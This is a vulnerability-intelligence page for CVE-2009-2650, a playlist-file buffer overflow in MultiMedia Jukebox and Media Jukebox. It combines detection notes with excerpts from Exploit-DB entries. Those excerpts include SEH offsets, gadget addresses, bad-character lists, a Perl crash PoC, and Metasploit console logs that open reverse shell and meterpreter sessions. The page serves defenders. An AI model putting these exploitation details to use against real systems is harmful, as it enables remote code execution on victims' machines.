CVE-2009-2650
published 2009-07-30CVE-2009-2650: Heap-based buffer overflow in Sorcerer Software MultiMedia Jukebox 4.0 Build 020124 allows remote attackers to cause a denial of service (application crash) or…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.69%
98.0th percentile
Heap-based buffer overflow in Sorcerer Software MultiMedia Jukebox 4.0 Build 020124 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .m3u or possibly (2) .pst file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sorcerersoftware | multimedia_jukebox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x68\x74\x74\x70\x3a\x2f\x2f
bytes↗
\xeb\x06\x90\x90
- →The exploit triggers on .m3u or .pls files that begin with a 'http://' header string followed by ~262 bytes of padding before the SEH overwrite. Look for abnormally large .m3u/.pls files with this structure. ↗
- →The .pls exploit requires a [playlist] header with 'File1=http://' to trigger the overflow; monitor for malformed .pls files containing this header followed by large buffers. ↗
- →The SEH overwrite occurs at offset 262 bytes into the payload buffer; a buffer of 262 'A' characters followed by a short JMP and SEH handler address is the exploit pattern. ↗
- →The PoC for MultiMedia Jukebox 4.0 uses a 5000-byte 'A' string written to a .m3u file to trigger the heap overflow; large .m3u files with repetitive byte patterns are suspicious. ↗
- →The Metasploit module targets dsp_mjMain.dll for its pop/pop/ret gadget; monitor for Media Jukebox loading this DLL and executing unusual code paths from it. ↗
- →The universal SEH exploit uses wnaspi32.dll as the pop/pop/ret gadget source; presence of wnaspi32.dll loaded in Media Jukebox process space during file parsing is notable. ↗
- →Bad characters for payload encoding include null bytes and common URL/path delimiters; payloads will avoid these bytes: \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x30 ↗
- ·The Metasploit module RET addresses are version- and SP-specific for dsp_mjMain.dll; the XP SP3 address (0x02951457) differs from XP SP2 (0x02291457), so detection based on these addresses is OS-patch-level dependent. ↗
- ·The .pls exploit uses a 'universal' SEH gadget from wnaspi32.dll (0x1001296f) claimed to work across Windows XP and Vista, but this relies on a fixed base address for wnaspi32.dll (no ASLR). ↗
- ·The NVD entry references MultiMedia Jukebox 4.0 Build 020124, while the exploit-db modules target Media Jukebox 8.0.400; these are different product versions and the CVE may apply to both or only one. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)
exploitdb·2009-12-27
CVE-2009-2650 Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)
Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)
---
##
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ron Henry ',
'dijital1',
],
'Version' => '$Revision: 11516 $',
'References'
Exploit-DB
Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
exploitdb·2009-08-31
CVE-2009-2650 Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
---
#!/usr/bin/python
#
# ######################################################################
#
# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)
# Author: mr_me
# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html
# Note: we needed a header to trigger this one ;)
# Tested on: Wind0ws XP and Vist@
# Greetz: offensive-security, I tried harder :)
#
# ######################################################################
#
# msf exploit(handler) > exploit
#
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Sending stage (474 bytes)
# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)
#
# Microsoft Windows XP [Version 5.
Exploit-DB
MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
exploitdb·2009-07-16
CVE-2009-2650 MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-16]
Exploit-DB
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
exploitdb·2009-05-07
CVE-2009-1675 32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
---
#msf > use exploit/windows/ftp/32bitftp_pasv_reply
#msf exploit(32bitftp_pasv) > set PAYLOAD windows/meterpreter/reverse_tcp
#PAYLOAD => windows/meterpreter/reverse_tcp
#msf exploit(32bitftp_pasv) > set LHOST 192.168.1.2
#LHOST => 192.168.1.2
#msf exploit(32bitftp_pasv) > exploit
#[*] Exploit running as background job.
#msf exploit(32bitftp_pasv) >
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Server started.
# Victim connecting to the malicious ftp server.
#[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
#[*] Sending stage (2650 bytes)
#[*] Sleeping before handling stage...
#[*] Uploading DLL (75787 bytes)...
#[*] Upload completed.
#[*] Meterpreter session 1 opened (192.168
Metasploit
Media Jukebox 8.0.400 Buffer Overflow (SEH)
metasploit
Media Jukebox 8.0.400 Buffer Overflow (SEH)
Media Jukebox 8.0.400 Buffer Overflow (SEH)
This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.
No writeups or analysis indexed.
2009-07-30
Published